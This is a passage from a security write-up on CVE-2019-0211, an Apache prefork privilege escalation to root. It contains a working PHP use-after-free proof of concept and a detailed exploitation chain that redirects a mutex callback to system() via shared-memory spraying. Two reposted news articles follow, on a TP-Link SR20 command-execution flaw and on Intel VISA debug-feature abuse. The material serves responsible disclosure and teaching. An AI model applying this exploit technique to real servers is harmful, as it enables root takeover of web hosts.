}
(gdb) ptype apr_proc_mutex_unix_lock_methods_t
apr_proc_mutex_unix_lock_methods_t {
    ...
    apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <--
    ...
}

No bound checks happen. Therefore, a rogue worker can change its bucket index and make it point to the shared memory, in order to control the prefork_child_bucket structure upon restart. Eventually, and before privileges are dropped, mutex->meth->child_init() is called. This results in an arbitrary function call as root.

Vulnerable code

We’ll go through server/mpm/prefork/prefork.c to find out where and how the bug happens.

  • A rogue worker changes its bucket index in shared memory to make it point to a structure of its own, also in SHM.
  • At 06:25AM the next day, logrotate requests a graceful restart from Apache.
  • Upon this, the main Apache process will first kill workers, and then spawn new ones.
  • The killing is done by sending SIGUSR1 to workers. They are expected to exit ASAP.
  • Then, prefork_run() (L853) is called to spawn new workers. Since retained->mpm->was_graceful is true (L861), workers are not restarted straight away.
  • Instead, we enter the main loop (L933) and monitor dead workers’ PIDs. When an old worker dies, ap_wait_or_timeout() returns its PID (L940).
  • The index of the process_score structure associated with this PID is stored in child_slot (L948).
  • If the death of this worker was not fatal (L969), make_child() is called with ap_get_scoreboard_process(child_slot)->bucket as a third argument (L985). As previously said, bucket’s value has been changed by a rogue worker.
  • make_child() creates a new child, fork()ing (L671) the main process.
  • The OOB read happens (L691), and my_bucket is therefore under the control of an attacker.
  • child_main() is called (L722), and the function call happens a bit further (L433).
  • SAFE_ACCEPT(<code>) will only execute <code> if Apache listens on two ports or more, which is often the case since a server listens over HTTP (80) and HTTPS (443).
  • Assuming <code> is executed, apr_proc_mutex_child_init() is called, which results in a call to (*mutex)->meth->child_init(mutex, pool, fname) with mutex under control.
  • Privileges are dropped a bit later in the execution (L446).

Exploitation

The exploitation is a four-step process:

  1. Obtain R/W access on a worker process
  2. Write a fake prefork_child_bucket structure in the SHM
  3. Make all_buckets[bucket] point to the structure
  4. Await 6:25AM to get an arbitrary function call

Advantages:

  • The main process never exits, so we know where everything is mapped by reading /proc/self/maps (ASLR/PIE useless)
  • When a worker dies (or segfaults), it is automatically restarted by the main process, so there is no risk of DOSing Apache

Problems:

  • PHP does not allow reading or writing /proc/self/mem, which blocks us from simply editing the SHM
  • all_buckets is reallocated after a graceful restart (!)
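The /proc/self/maps advantage noted above boils down to parsing a few text lines. The sketch below is a minimal Python illustration (the exploit itself runs in PHP); the Mapping type and function names are made up, and the field layout follows the standard Linux maps format of address range, permissions, offset, device, inode and optional path.

```python
from typing import NamedTuple


class Mapping(NamedTuple):
    start: int
    end: int
    perms: str
    path: str


def parse_maps_line(line: str) -> Mapping:
    """Parse one line of /proc/<pid>/maps into a Mapping."""
    fields = line.split(None, 5)
    start, end = (int(part, 16) for part in fields[0].split("-"))
    path = fields[5].strip() if len(fields) > 5 else ""
    return Mapping(start, end, fields[1], path)


def shared_writable(lines):
    """Return the mappings that are readable, writable and shared (rw-s),
    which is how the scoreboard SHM shows up in the output in this post."""
    mappings = [parse_maps_line(line) for line in lines if line.strip()]
    return [m for m in mappings if m.perms == "rw-s"]


if __name__ == "__main__":
    with open("/proc/self/maps") as handle:
        for mapping in shared_writable(handle):
            print(hex(mapping.start), hex(mapping.end), mapping.path)
```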

1. Obtain R/W access on a worker process

PHP UAF 0-day

Since mod_prefork is often used in combination with mod_php, it seems natural to exploit the vulnerability through PHP. CVE-2019-6977 would be a perfect candidate, but it was not out when I started writing the exploit. I went with a 0day UAF in PHP 7.x (which seems to work in PHP5.x as well):

PHP UAF

<?php

class X extends DateInterval implements JsonSerializable
{
  public function jsonSerialize()
  {
    global $y, $p;
    unset($y[0]);
    $p = $this->y;
    return $this;
  }
}

function get_aslr()
{
  global $p, $y;
  $p = 0;

  $y = [new X('PT1S')];
  json_encode([1234 => &$y]);
  print("ADDRESS: 0x" . dechex($p) . "\n");

  return $p;
}

get_aslr();

This is a UAF on a PHP object: we unset $y[0] (an instance of X), but it is still usable using $this.

UAF to Read/Write

We want to achieve two things:

  • Read memory to find all_buckets’ address
  • Edit the SHM to change the bucket index and add our custom mutex structure

Luckily for us, PHP’s heap is located before those two in memory.

Memory addresses of PHP’s heap, ap_scoreboard_image->* and all_buckets

root@apaubuntu:~# cat /proc/6318/maps | grep libphp | grep rw-p
7f4a8f9f3000-7f4a8fa0a000 rw-p 00471000 08:02 542265 /usr/lib/apache2/modules/libphp7.2.so

(gdb) p *ap_scoreboard_image 
$14 = {
  global = 0x7f4a9323e008, 
  parent = 0x7f4a9323e020, 
  servers = 0x55835eddea78
}
(gdb) p all_buckets 
$15 = (prefork_child_bucket *) 0x7f4a9336b3f0

Since we’re triggering the UAF on a PHP object, any property of this object will be UAF’d too; we can convert this zend_object UAF into a zend_string one. This is useful because of zend_string’s structure:

(gdb) ptype zend_string
type = struct _zend_string {
    zend_refcounted_h gc;
    zend_ulong h;
    size_t len;
    char val[1];
}

The len property contains the length of the string. By incrementing it, we can read and write further in memory, and therefore access the two memory regions we’re interested in: the SHM and Apache’s all_buckets.
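To make the arithmetic concrete, here is a minimal Python sketch of how large len has to become for the string's val buffer to cover a given target. It assumes a 64-bit build in which gc, h and len take 8 bytes each, so that val starts at offset 24, and it assumes a 24-byte target (three pointers). The string address is hypothetical; the all_buckets address is the one from the gdb session above.

```python
# Offset of `val` inside zend_string, assuming a 64-bit build where
# gc, h and len are 8 bytes each.
ZEND_STRING_VAL_OFFSET = 24


def required_len(string_addr: int, target_addr: int, target_size: int) -> int:
    """Smallest `len` for which val[0..len) covers the whole target range."""
    val_addr = string_addr + ZEND_STRING_VAL_OFFSET
    if target_addr < val_addr:
        raise ValueError("target lies before the string; len cannot reach it")
    return target_addr + target_size - val_addr


# Hypothetical address of the zend_string (not taken from the article).
string_addr = 0x7F4A8FA00000
# Address printed by gdb above.
all_buckets = 0x7F4A9336B3F0

# Assumed target size: one prefork_child_bucket of three 8-byte pointers.
needed = required_len(string_addr, all_buckets, 24)
print(hex(needed))
```

The check for a target below val reflects the remark above: this only works because PHP's heap sits before both regions in memory.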

Locating bucket indexes and all_buckets

We want to change ap_scoreboard_image->parent[worker_id]->bucket for a certain worker_id. Luckily, the structure always starts at the beginning of the shared memory block, so it is easy to locate.

Shared memory location and targeted process_score structures

root@apaubuntu:~# cat /proc/6318/maps | grep rw-s
7f4a9323e000-7f4a93252000 rw-s 00000000 00:05 57052                      /dev/zero (deleted)

(gdb) p &ap_scoreboard_image->parent[0]
$18 = (process_score *) 0x7f4a9323e020
(gdb) p &ap_scoreboard_image->parent[1]
$19 = (process_score *) 0x7f4a9323e044
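The two gdb addresses above are enough to derive the layout of the array. The following Python sketch only does that subtraction and extrapolates to other entries; the constant names are illustrative, and the computed stride applies to this particular build.

```python
SHM_BASE = 0x7F4A9323E000   # start of the rw-s mapping shown above
PARENT_0 = 0x7F4A9323E020   # &ap_scoreboard_image->parent[0]
PARENT_1 = 0x7F4A9323E044   # &ap_scoreboard_image->parent[1]

# Distance between consecutive entries, i.e. sizeof(process_score) on this build.
STRIDE = PARENT_1 - PARENT_0


def process_score_addr(worker_id: int) -> int:
    """Address of parent[worker_id], extrapolated from the two known entries."""
    return PARENT_0 + worker_id * STRIDE


print(STRIDE, hex(PARENT_0 - SHM_BASE), hex(process_score_addr(3)))
```

So the array starts 0x20 bytes into the shared memory block and each entry is 0x24 (36) bytes long.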

To locate all_buckets, we can make use of our knowledge of the prefork_child_bucket structure. We have:

Important structures of bucket items

prefork_child_bucket {
    ap_pod_t *pod;
    ap_listen_rec *listeners;
    apr_proc_mutex_t *mutex; <--
}

apr_proc_mutex_t {
    apr_pool_t *pool;
    const apr_proc_mutex_unix_lock_methods_t *meth; <--
    int curr_locked;
    char *fname;

    ...
}

apr_proc_mutex_unix_lock_methods_t {
    unsigned int flags;
    apr_status_t (*create)(apr_proc_mutex_t *, const char *);
    apr_status_t (*acquire)(apr_proc_mutex_t *);
    apr_status_t (*tryacquire)(apr_proc_mutex_t *);
    apr_status_t (*release)(apr_proc_mutex_t *);
    apr_status_t (*cleanup)(void *);
    apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <--
    apr_status_t (*perms_set)(apr_proc_mutex_t *, apr_fileperms_t, apr_uid_t, apr_gid_t);
    apr_lockmech_e mech;
    const char *name;
}

all_buckets[0]->mutex will be located in the same memory region as all_buckets[0]. Since meth is a static structure, it will be located in libapr’s .data. Since meth points to functions defined in libapr, each of the function pointers will be located in libapr’s .text.

Since we know those regions’ addresses through /proc/self/maps, we can go through every pointer in Apache’s memory and find one that matches the structure. It will be all_buckets[0].

As I mentioned, all_buckets’ address changes at every graceful restart. This means that when our exploit triggers, all_buckets’ address will be different from the one we found. This has to be taken into account; we’ll talk about this later.
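The structure matching described above boils down to asking, for each candidate pointer, which mapping it falls into. A minimal Python sketch of that lookup follows; it parses maps-style text and returns the region containing an address. The Region type and function names are illustrative, and the sample lines are the two mappings quoted earlier in this post.

```python
from typing import List, NamedTuple, Optional


class Region(NamedTuple):
    start: int
    end: int      # exclusive
    perms: str
    path: str


def parse_maps(text: str) -> List[Region]:
    """Parse /proc/<pid>/maps-style lines into Region tuples."""
    regions = []
    for line in text.splitlines():
        fields = line.split(None, 5)
        if len(fields) < 5:
            continue  # skip blank or malformed lines
        start, end = (int(x, 16) for x in fields[0].split("-"))
        path = fields[5].strip() if len(fields) > 5 else ""
        regions.append(Region(start, end, fields[1], path))
    return regions


def region_of(regions: List[Region], addr: int) -> Optional[Region]:
    """Return the mapping that contains addr, or None if it is unmapped."""
    for region in regions:
        if region.start <= addr < region.end:
            return region
    return None


SAMPLE_MAPS = """\
7f4a8f9f3000-7f4a8fa0a000 rw-p 00471000 08:02 542265 /usr/lib/apache2/modules/libphp7.2.so
7f4a9323e000-7f4a93252000 rw-s 00000000 00:05 57052                      /dev/zero (deleted)
"""

regions = parse_maps(SAMPLE_MAPS)
print(region_of(regions, 0x7F4A9323E020))
```

A candidate for all_buckets[0] would then be kept only if its mutex pointer, the meth pointer behind it, and the function pointers behind that each resolve to the expected kind of region.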

2. Write a fake prefork_child_bucket structure in the SHM

Reaching the function call

The code path to the arbitrary function call is the following:

bucket_id = ap_scoreboard_image->parent[id]->bucket
my_bucket = all_buckets[bucket_id]
mutex = &my_bucket->mutex
apr_proc_mutex_child_init(mutex)
(*mutex)->meth->child_init(mutex, pool, fname)
Call:reach
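The first two steps of this path are plain pointer arithmetic on an index read from the SHM. The Python sketch below shows where my_bucket and its mutex field end up for a given index. It assumes 64-bit pointers, so that prefork_child_bucket (three pointers) is 24 bytes with mutex at offset 16; the function names are illustrative.

```python
BUCKET_SIZE = 24    # sizeof(prefork_child_bucket): three 8-byte pointers (assumed)
MUTEX_OFFSET = 16   # `mutex` follows `pod` and `listeners`


def my_bucket_addr(all_buckets: int, bucket_id: int) -> int:
    """Address of all_buckets[bucket_id]; the index may be negative."""
    return all_buckets + bucket_id * BUCKET_SIZE


def mutex_field_addr(all_buckets: int, bucket_id: int) -> int:
    """Address of the `mutex` pointer inside all_buckets[bucket_id]."""
    return my_bucket_addr(all_buckets, bucket_id) + MUTEX_OFFSET


ALL_BUCKETS = 0x7F4A9336B3F0  # value printed by gdb earlier in this post

print(hex(my_bucket_addr(ALL_BUCKETS, 0)))
print(hex(my_bucket_addr(ALL_BUCKETS, -1)))
print(hex(mutex_field_addr(ALL_BUCKETS, -1)))
```

Because nothing constrains the index to the real array, a large negative value moves my_bucket well below all_buckets, which is where the shared memory lives in the layout shown earlier.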

Calling something proper

To exploit, we make (*mutex)->meth->child_init point to zend_object_std_dtor(zend_object *object), which yields the following chain:

mutex = &my_bucket->mutex
[object = mutex]

zend_object_std_dtor(object)
ht = object->properties
zend_array_destroy(ht)
zend_hash_destroy(ht)
val = &ht->arData[0]->val
ht->pDestructor(val)

pDestructor is set to system, and &ht->arData[0]->val is a string.

Call:exec

As you can see, both leftmost structures are superimposed.

3. Make all_buckets[bucket] point to the structure

Problem and solution

If all_buckets’ address were unchanged between restarts, our exploit would be complete at this point:

  • Get R/W over all memory after PHP’s heap
  • Find all_buckets by matching its structure
  • Put our structure in the SHM
  • Change one of the process_score.bucket values in the SHM so that all_buckets[bucket]->mutex points to our payload

As all_buckets’ address changes, we can do two things to improve reliability: spray the SHM and use every process_score structure, one for each PID.

Spraying the shared memory

If all_buckets’ new address is not far from the old one, my_bucket will point close to our structure. Therefore, instead of placing our prefork_child_bucket structure at one precise point in the SHM, we can spray it all over the unused parts of the SHM. The problem is that the structure is also used as a zend_object, so it must be (5 * 8 =) 40 bytes long to include zend_object.properties. Spraying a structure that big over a space this small won’t help us much. To solve this problem, we superimpose the two center structures, apr_proc_mutex_t and zend_array, and spray their address over the rest of the shared memory. As a result, prefork_child_bucket.mutex and zend_object.properties point to the same address. Now, if all_buckets is relocated not too far from its original address, my_bucket will land in the sprayed area.

Call:exec

Using every process_score

Each Apache worker has an associated process_score structure, and with it a bucket index. Instead of changing one process_score.bucket value, we can change every one of them, so that they cover another part of memory. For instance:

ap_scoreboard_image->parent[0]->bucket = -10000 -> 0x7faabbcc00 <= all_buckets <= 0x7faabbdd00
ap_scoreboard_image->parent[1]->bucket = -20000 -> 0x7faabbdd00 <= all_buckets <= 0x7faabbff00
ap_scoreboard_image->parent[2]->bucket = -30000 -> 0x7faabbff00 <= all_buckets <= 0x7faabc0000

This multiplies our success rate by the number of Apache workers. Upon respawn, only one worker has a valid bucket number, but this is not a problem because the others will crash and immediately respawn.
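The ranges in the example above follow from one inequality: my_bucket lands in the sprayed area when spray_lo <= all_buckets + index * 24 < spray_hi. The Python sketch below rearranges that into the window of all_buckets addresses each index tolerates. The sprayed area, the starting index and the 24-byte bucket size (64-bit pointers) are all hypothetical values chosen for illustration.

```python
BUCKET_SIZE = 24  # three 8-byte pointers, 64-bit assumption


def tolerated_window(spray_lo: int, spray_hi: int, bucket_id: int):
    """Range [lo, hi) of all_buckets addresses for which
    all_buckets + bucket_id * BUCKET_SIZE falls inside [spray_lo, spray_hi)."""
    shift = bucket_id * BUCKET_SIZE
    return spray_lo - shift, spray_hi - shift


# Hypothetical sprayed area; its size is a multiple of BUCKET_SIZE.
SPRAY_LO = 0x7F4A9323F000
SPRAY_HI = SPRAY_LO + 0x12000

# Stepping the index by the spray size (in buckets) makes the windows adjacent.
STEP = (SPRAY_HI - SPRAY_LO) // BUCKET_SIZE
FIRST_INDEX = -50000  # hypothetical index given to worker 0

windows = [
    tolerated_window(SPRAY_LO, SPRAY_HI, FIRST_INDEX - worker * STEP)
    for worker in range(4)
]

for lo, hi in windows:
    print(hex(lo), hex(hi))
```

With four workers the covered range of all_buckets addresses is four times the size of the sprayed area, which is the multiplication described above.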

Success rate

Different Apache servers have different numbers of workers. Having more workers means we can spray the address of our mutex over less memory, but it also means we can specify more indexes for all_buckets. Overall, having more workers improves our success rate. After a few tries on my test Apache server with 4 workers (the default), I had a ~80% success rate. The success rate jumps to ~100% with more workers.

Again, if the exploit fails, it can be restarted the next day, as Apache will still restart properly. Apache’s error.log will nevertheless contain notifications about its workers segfaulting.

4. Await 6:25AM for the exploit to trigger

Well, that’s the easy step.

Vulnerability timeline

  • 2019-02-22 Initial contact email to security[at]apache[dot]org, with description and POC
  • 2019-02-25 Acknowledgment of the vulnerability, working on a fix
  • 2019-03-07 Apache’s security team sends a patch for me to review, CVE assigned
  • 2019-03-10 I approve the patch
  • 2019-04-01 Apache HTTP version 2.4.39 released

Apache’s team has been prompt to respond and patch, and nice as hell. Really good experience. PHP never answered regarding the UAF.

Questions

Why the name?

CARPE: stands for CVE-2019-0211 Apache Root Privilege Escalation
DIEM: the exploit triggers once a day

I had to.

Can the exploit be improved?

Yes. For instance, my computations for the bucket indexes are shaky. This is somewhere between a POC and a proper exploit. BTW, I added tons of comments; it is meant to be educational as well.

Does this vulnerability target PHP?

No. It targets the Apache HTTP server.

Exploit

The exploit is available here.

TP-Link ‘smart’ router proves to be anything but smart – just like its maker: Zero-day vuln dropped after silence

Original text by Thomas Claburn

TP-Link’s all-in-one SR20 Smart Home Router allows arbitrary command execution from a local network connection, according to a Google security researcher.

On Wednesday, 90 days after he informed TP-Link of the issue and received no response, Matthew Garrett, a well-known Google security engineer and open-source contributor, disclosed a proof-of-concept exploit to demonstrate a vulnerability affecting TP-Link’s router.

The 38-line script shows that you can execute any command you choose on the device with root privileges, without authentication. The SR20 was announced in 2016.

Via Twitter, Garrett explained that TP-Link hardware often incorporates TDDP, the TP-Link Device Debug Protocol, which has had multiple vulnerabilities in the past. Among them, version 1 did not require a password.

“The SR20 still exposes some version 1 commands, one of which (command 0x1f, request 0x01) appears to be for some sort of configuration validation,” he said. “You send it a filename, a semicolon and then an argument.”

Once it receives the command, says Garrett, the router responds to the requesting machine via TFTP, asks for the filename, imports it to a Lua interpreter, running as root, and sends the argument to the config_test() function within the imported file.

The Lua os.execute() method passes a command to be executed by an operating system shell. And since the interpreter is running as root, Garrett explains, you have arbitrary command execution.

However, while TDDP listens on all interfaces, the default firewall prevents network access, says Garrett. This makes the issue less of a concern than the remote code execution flaws identified in TP-Link 1GbE VPN routers in November.

Even so, vulnerability to a local attack could be exploited if an attacker manages to get a malicious download onto a machine connected to an SR20 router.

TP-Link did not immediately respond to a request for comment.

Garrett concluded his disclosure by urging TP-Link to provide a way to report security flaws and not to ship debug daemons on production firmware.

Researchers discover and abuse new undocumented feature in Intel chipsets

Original text by Catalin Cimpanu

Researchers find new Intel VISA (Visualization of Internal Signals Architecture) debugging technology.

At the Black Hat Asia 2019 security conference, security researchers from Positive Technologies disclosed the existence of a previously unknown and undocumented feature in Intel chipsets.

Positive Technologies researchers Maxim Goryachy and Mark Ermolov said the feature, called Intel Visualization of Internal Signals Architecture (Intel VISA), is a new utility included in modern Intel chipsets to help with testing and debugging on manufacturing lines.

VISA is included with the Platform Controller Hub (PCH) chipsets that are part of modern Intel CPUs, and it works like a full-fledged logic signal analyzer.

According to the two researchers, VISA intercepts electronic signals sent from internal buses and peripherals (display, keyboard, and webcam) to the PCH, and later to the main CPU.

VISA EXPOSES A COMPUTER’S ENTIRE DATA

Unauthorized access to the VISA feature would allow a threat actor to intercept data from the computer memory and create spyware that works at the lowest possible level.

But despite its extremely intrusive nature, very little is known about this new technology. Goryachy and Ermolov said VISA’s documentation is subject to a non-disclosure agreement, and not available to the general public.

Normally, this combination of secrecy and a secure default should keep Intel users safe from possible attacks and abuse.

However, the two researchers said they found several methods of enabling VISA and abusing it to sniff data that passes through the CPU, and even through the secretive Intel Management Engine (ME), which has been housed in the PCH since the release of the Nehalem processors and 5-Series chipsets.

INTEL SAYS IT’S SAFE. RESEARCHERS DISAGREE.

Goryachy and Ermolov said their technique requires neither hardware modifications to a computer’s motherboard nor any specific equipment to carry out.

The simplest method consists of using the vulnerabilities detailed in Intel’s Intel-SA-00086 security advisory to take control of the Intel Management Engine and enable VISA that way.

“The Intel VISA issue, as discussed at BlackHat Asia, relies on physical access and a previously mitigated vulnerability addressed in INTEL-SA-00086 on November 20, 2017,” an Intel spokesperson told ZDNet yesterday.

“Customers who have applied those mitigations are protected from known vectors,” the company said.

However, in an online discussion after his Black Hat talk, Ermolov said the Intel-SA-00086 fixes are not enough, as Intel firmware can be downgraded to vulnerable versions where the attackers can take over Intel ME and later enable VISA.

Furthermore, Ermolov said that there are three other ways to enable Intel VISA, methods that will become public when Black Hat organizers publish the duo’s presentation slides in the coming days.

As Ermolov said yesterday, VISA is not a vulnerability in Intel chipsets, but just another way in which a useful feature could be abused and turned against users. The chances that VISA will be abused are low: anyone who goes to the trouble of exploiting the Intel-SA-00086 vulnerabilities to take over Intel ME will likely use that component to carry out their attacks, rather than rely on VISA.

As a side note, this is the second “manufacturing mode” feature Goryachy and Ermolov found in the past year. They also found that Apple accidentally shipped some laptops with Intel CPUs that were left in “manufacturing mode.”